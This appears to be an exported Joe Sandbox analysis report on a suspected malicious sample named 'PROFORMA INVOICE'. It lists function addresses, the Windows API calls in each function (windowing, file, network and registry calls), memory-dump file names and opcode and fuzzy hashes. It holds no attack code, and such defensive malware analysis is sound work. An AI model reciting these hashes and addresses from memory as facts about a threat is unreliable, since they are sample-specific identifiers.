Function 00F991CC Relevance: 6.2, APIs: 4, Instructions: 201memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00F991DD
SysAllocString.OLEAUT32(?), ref: 00F99286
VariantCopy.OLEAUT32 ref: 00F992B5
VariantClear.OLEAUT32(?), ref: 00F992DC

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: b76e9807a738b5079719c34d4159a3f97c36e472900de703c4854aeae2db16c0
Instruction ID: 2f316384cdb7ea54ae95671b396882d733bcc6dc9db311ea015002fd9c168aaf
Opcode Fuzzy Hash: b76e9807a738b5079719c34d4159a3f97c36e472900de703c4854aeae2db16c0
Instruction Fuzzy Hash: 5B517731A083069BFF249F6ED891B2EB3A9EF55310F25C81FE55AC72D1DBB49840A705

Function 00F8365B Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F836B7
_memcpy_s.LIBCMT ref: 00F83729
__filbuf.LIBCMT ref: 00F837AA
_memset.LIBCMT ref: 00F837EE

Part of subcall function 00F87C0E: __getptd_noexit.LIBCMT ref: 00F87C0E

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit_memcpy_s
String ID:
API String ID: 3877424927-0
Opcode ID: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
Instruction ID: 329f3fee36aa939789546ec56edd434bf7fcce42a833d8b564bf18c8e22eb478
Opcode Fuzzy Hash: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
Instruction Fuzzy Hash: 5F5188B1E04205ABDF24BF69C8856DE77A1AF40B30F248729F825962F0E775DF50AB40

Function 00FCC4D7 Relevance: 6.1, APIs: 4, Instructions: 137COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(015AAA60,?), ref: 00FCC544
ScreenToClient.USER32(?,00000002), ref: 00FCC574
MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 00FCC5DA

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 880af443b91b4999184afa190d3b7f6bc84fa926d3b6945f38843e6ac899daf9
Instruction ID: 3f455201fbec7eb68a863f92c7f5b2d75200546f326428c4c27d584e016e8cee
Opcode Fuzzy Hash: 880af443b91b4999184afa190d3b7f6bc84fa926d3b6945f38843e6ac899daf9
Instruction Fuzzy Hash: 91515E75D00209EFCF20DF68C981EAE77B6EB59320F248659F9599B290D730ED41EB90

Function 00F9C410 Relevance: 6.1, APIs: 4, Instructions: 130windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00F9C462
__itow.LIBCMT ref: 00F9C49C

Part of subcall function 00F9C6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00F9C753

SendMessageW.USER32(?,0000110A,00000001,?), ref: 00F9C505
__itow.LIBCMT ref: 00F9C55A

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: d4f5de4bc82292110544f8b8c65b91c8e9ab5fc6a982a91ccad33eac334a15f0
Instruction ID: 718df8f70b4319d2c4067338c53c6772a92458719128b8f5add9341e5ccc21f3
Opcode Fuzzy Hash: d4f5de4bc82292110544f8b8c65b91c8e9ab5fc6a982a91ccad33eac334a15f0
Instruction Fuzzy Hash: EF41B671A00209AFEF25EF58CC51FEE7BB9AF49710F040019F945A7281DB789A45EBE1

Function 00FAE698 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00FAE742
GetLastError.KERNEL32(?,00000000), ref: 00FAE768
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00FAE78D
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00FAE7B9

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 53b8be6bb3a07bb2cb7946098ba15741b1962d5aac65454c68ca2d86674fcb3f
Instruction ID: c8f9451c119adca94c4649a46c6352314fa92b63195f3be33a877ccc1f399215
Opcode Fuzzy Hash: 53b8be6bb3a07bb2cb7946098ba15741b1962d5aac65454c68ca2d86674fcb3f
Instruction Fuzzy Hash: 9A4128356006109FCF11AF15C88594DBBE9FF59720B098489E9169B362CB78FC00AB91

Function 00FCB544 Relevance: 6.1, APIs: 4, Instructions: 108COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00FCB5D1

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 319b2191da7c0248daef5d89abc1e003ad8a05d6c28637acd7a5ad1aeabac9a4
Instruction ID: e948a7b32e933381820371655bdb28ff90905e6f494bbbfcfe1c38d138244cd5
Opcode Fuzzy Hash: 319b2191da7c0248daef5d89abc1e003ad8a05d6c28637acd7a5ad1aeabac9a4
Instruction Fuzzy Hash: 1431D23DA0110AEFEF348E18CE8BFAC7765AB05320F684959F651D62E1C735A940BB51

Function 00FCD7DE Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 00FCD807
GetWindowRect.USER32(?,?), ref: 00FCD87D
PtInRect.USER32(?,?,00FCED5A), ref: 00FCD88D
MessageBeep.USER32(00000000), ref: 00FCD8FE

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: c831da0089cb888ad10159e0ecce7c289ba8cc0b1d4fdc4d2f9ba7dde413943b
Instruction ID: 527e1728aadd19c8ec4f5dc935d1b3dc9aeaceeadee71bc081dc678a7921b8d8
Opcode Fuzzy Hash: c831da0089cb888ad10159e0ecce7c289ba8cc0b1d4fdc4d2f9ba7dde413943b
Instruction Fuzzy Hash: 38418B74A0021ADFCB21DF58C986FAD7BB5BB88360F2881B9E4159B294D331E945EB40

Function 00F94004 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00F94038
__isleadbyte_l.LIBCMT ref: 00F94066
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00F94094
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00F940CA

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 9b2f6e52b6a3ea8dbd454496a0d58f2c7752931cfa8b2931d508db4b8c23ed20
Instruction ID: bec86cc1bd1e56836dbbcf7a609ff178dbfb4096bc325d4b03c8d1ffc86be6f2
Opcode Fuzzy Hash: 9b2f6e52b6a3ea8dbd454496a0d58f2c7752931cfa8b2931d508db4b8c23ed20
Instruction Fuzzy Hash: CA31B231A00246AFEF219F75CC44FAA7BA5FF51320F154428E6658B1B1E731E892E790

Function 00FC7CA5 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00FC7CB9

Part of subcall function 00FA5F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 00FA5F6F
Part of subcall function 00FA5F55: GetCurrentThreadId.KERNEL32 ref: 00FA5F76
Part of subcall function 00FA5F55: AttachThreadInput.USER32(00000000,?,00FA781F), ref: 00FA5F7D

GetCaretPos.USER32(?), ref: 00FC7CCA
ClientToScreen.USER32(00000000,?), ref: 00FC7D03
GetForegroundWindow.USER32 ref: 00FC7D09

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 7d1c672f36afb03a7f55c43167cd151c2ba48d7352d15a045674ceb9b50b7ad7
Instruction ID: 42369ec93759c896f1f604db8d0b4247cbfb2c123453b47d6bcaf27197fbe2ef
Opcode Fuzzy Hash: 7d1c672f36afb03a7f55c43167cd151c2ba48d7352d15a045674ceb9b50b7ad7
Instruction Fuzzy Hash: 71311E72900108AFDB11EFA5DC859EFBBFDEF54310B10846AE819E7211DA359E059FA1

Function 00FCF1D7 Relevance: 6.1, APIs: 4, Instructions: 80windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F7B34E: GetWindowLongW.USER32(?,000000EB), ref: 00F7B35F

GetCursorPos.USER32(?), ref: 00FCF211
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00FDE4C0,?,?,?,?,?), ref: 00FCF226
GetCursorPos.USER32(?), ref: 00FCF270
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00FDE4C0,?,?,?), ref: 00FCF2A6

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: c07a7b4370d6b7dcafaf6cff8b8680640f34573048bd5ffbed37c8eb40fc1d8e
Instruction ID: 709d00a5347c5ae3640f300e3fb756201d233620f594424f5de1496428aa45e8
Opcode Fuzzy Hash: c07a7b4370d6b7dcafaf6cff8b8680640f34573048bd5ffbed37c8eb40fc1d8e
Instruction Fuzzy Hash: 5A21A239500118EFCB258F54C859EFEBBB6EF09720F188069F9058B1A1D3359A50EB50

Function 00FB431C Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00FB4358

Part of subcall function 00FB43E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00FB4401
Part of subcall function 00FB43E2: InternetCloseHandle.WININET(00000000), ref: 00FB449E

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: bd37daa47fc3b65f3074d35d885cb9a29d3b3c65e9449861376f36a84cbf9e83
Instruction ID: b4b80b98ff3f05b0c56f1a47d24679723b2668158da9d2459054d40c624e8e86
Opcode Fuzzy Hash: bd37daa47fc3b65f3074d35d885cb9a29d3b3c65e9449861376f36a84cbf9e83
Instruction Fuzzy Hash: FA21C236600705BBDB119F619D40FFBB7E9FF44710F08401ABA1596952D775E820BB90

Function 00FB8A7F Relevance: 6.1, APIs: 4, Instructions: 69networkCOMMON

Download Yara Rule

APIs

select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00FB8AE0
__WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00FB8AF2
accept.WSOCK32(00000000,00000000,00000000), ref: 00FB8AFF
WSAGetLastError.WSOCK32(00000000), ref: 00FB8B16

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: ErrorLastacceptselect
String ID:
API String ID: 385091864-0
Opcode ID: b8ecff0c66b04fe4b5140f0a54f84bc81b016a7d653a796776b6f0f3de742c57
Instruction ID: b9b450366bf395f299a7adb0165d5ef453726b7bd59f075ce3efe9d769e0c4cf
Opcode Fuzzy Hash: b8ecff0c66b04fe4b5140f0a54f84bc81b016a7d653a796776b6f0f3de742c57
Instruction Fuzzy Hash: 44216672A001249FC7219F69CC85ADE7BECEF9A360F00816AF849DB251DB74D941DF91

Function 00FC8A37 Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 00FC8AA6
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00FC8AC0
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00FC8ACE
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00FC8ADC

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: 48709cdeaa22018607754d18808f7644d40067631c0d2bec92fbd05c0de17865
Instruction ID: 1a884732e88cdc630b4980ad2b587deb91eedca2002314b5cc507973f0234ede
Opcode Fuzzy Hash: 48709cdeaa22018607754d18808f7644d40067631c0d2bec92fbd05c0de17865
Instruction Fuzzy Hash: C311D031305515BFD704AB18CD46FBA7799FF85360F14411AF816CB2E1CB78AC01A790

Function 00FA0AA6 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00FA1E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00FA0ABB,?,?,?,00FA187A,00000000,000000EF,00000119,?,?), ref: 00FA1E77
Part of subcall function 00FA1E68: lstrcpyW.KERNEL32(00000000,?,?,00FA0ABB,?,?,?,00FA187A,00000000,000000EF,00000119,?,?,00000000), ref: 00FA1E9D
Part of subcall function 00FA1E68: lstrcmpiW.KERNEL32(00000000,?,00FA0ABB,?,?,?,00FA187A,00000000,000000EF,00000119,?,?), ref: 00FA1ECE

lstrlenW.KERNEL32(?,00000002,?,?,?,?,00FA187A,00000000,000000EF,00000119,?,?,00000000), ref: 00FA0AD4
lstrcpyW.KERNEL32(00000000,?,?,00FA187A,00000000,000000EF,00000119,?,?,00000000), ref: 00FA0AFA
lstrcmpiW.KERNEL32(00000002,cdecl,?,00FA187A,00000000,000000EF,00000119,?,?,00000000), ref: 00FA0B2E

Strings

cdecl, xrefs: 00FA0B25

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 8b5140e63d5eab665fd3cd88452b5e8a734ecbb665ac7a80d114761af9191176
Instruction ID: c351d42e1fe02dea4e9c6dd7b739fa5a980278e411be697d0fcea5e8e9233960
Opcode Fuzzy Hash: 8b5140e63d5eab665fd3cd88452b5e8a734ecbb665ac7a80d114761af9191176
Instruction Fuzzy Hash: CB11B676200345AFDB25AF34DC45E7A77A9FF86364F80406AF806CB250EF75A850E7A1

Function 00F92F96 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00F92FB5

Part of subcall function 00F8395C: __FF_MSGBANNER.LIBCMT ref: 00F83973
Part of subcall function 00F8395C: __NMSG_WRITE.LIBCMT ref: 00F8397A
Part of subcall function 00F8395C: RtlAllocateHeap.NTDLL(01580000,00000000,00000001,00000001,00000000,?,?,00F7F507,?,0000000E), ref: 00F8399F

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 6c4e98bf29d2ef9fc36ca06db68911f1eb946258b32178d9b647795f6a27f76f
Instruction ID: 5a5d951afd834437cc983667d1ac621d4b04513078675b4cba8dd8d835d1b1af
Opcode Fuzzy Hash: 6c4e98bf29d2ef9fc36ca06db68911f1eb946258b32178d9b647795f6a27f76f
Instruction Fuzzy Hash: F911CA32909315AFEF317F74AC457A93B98AF05374F304525F8499A165DB38C940FB90

Function 00F7EB83 Relevance: 6.1, APIs: 4, Instructions: 65timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F7EBB2

Part of subcall function 00F651AF: _memset.LIBCMT ref: 00F6522F
Part of subcall function 00F651AF: _wcscpy.LIBCMT ref: 00F65283
Part of subcall function 00F651AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00F65293

KillTimer.USER32(?,00000001,?,?), ref: 00F7EC07
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00F7EC16
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00FD3C88

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: f44fa2f4515e4be4eb70f6ad905c7b28cc855e47e2e5b5432a6e779812165911
Instruction ID: 6204defaeb68ff53edad2c51f21a6294c625de66807c4d721d489ba7e791edd4
Opcode Fuzzy Hash: f44fa2f4515e4be4eb70f6ad905c7b28cc855e47e2e5b5432a6e779812165911
Instruction Fuzzy Hash: D12129759047849FE7339B28CC55BE7BBED9B05318F04009FE78E66281C3742A84EB52

Function 00FA058F Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00FA05AC
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00FA05C7
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00FA05DD
FreeLibrary.KERNEL32(?), ref: 00FA0632

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Type$FileFreeLibraryLoadModuleNameRegister
String ID:
API String ID: 3137044355-0
Opcode ID: 963fa864215a07f75bf7d8adca275a8d527aec792f965544cbbd36baacd2f420
Instruction ID: 326acd63ddc8b7f066dd7fd1d84fe79bab7b693a4e893437721fb092908a5c9e
Opcode Fuzzy Hash: 963fa864215a07f75bf7d8adca275a8d527aec792f965544cbbd36baacd2f420
Instruction Fuzzy Hash: 822181B1D00209EFDB20DF91ED88ADABBB8EF41708F008469E51696250DF75EA55EF50

Function 00FA6713 Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00FA6733
_memset.LIBCMT ref: 00FA6754
